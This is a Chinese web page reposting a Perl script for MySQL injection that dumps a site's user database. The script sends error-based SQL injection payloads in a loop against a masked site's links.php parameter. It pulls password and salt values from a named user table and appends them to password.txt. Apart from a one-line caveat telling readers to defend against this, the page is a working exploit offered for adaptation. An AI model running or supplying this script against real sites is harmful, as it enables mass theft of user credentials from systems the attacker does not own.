鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 脚本攻防 > >

mysql注入导库脚本代码

来源:互联网 作者:佚名 时间:2012-10-18 14:27
mysql注入导库脚本代码,学习安全的朋友要注意防范。

代码如下:
#!/usr/bin/perl -w
#www.sh3llc0de.com
#转载须注明
#语法 自己改改
use strict;
use LWP::Simple;
use utf8;
$|++;
my $count = 1;
for ($count = 1; $count <= 600_000; $count++) {
print 'ID: ', $count, "\n";
my $url = 'http://www.***.com/links.php?out=2 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x5e24,0x7c,password,0x3A,salt,0x245e) FROM `wowguru_db`.user LIMIT%20' . $count . ',1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1';
#print "$url\n";
my $content = get($url);
while ($content =~ m|\^\$(.+?)\$\^|igs) {
open FILE, ">>", "password.txt" or die $!;
print "$1\n";
print FILE "$1\n";
close FILE;
}
}

网友评论
<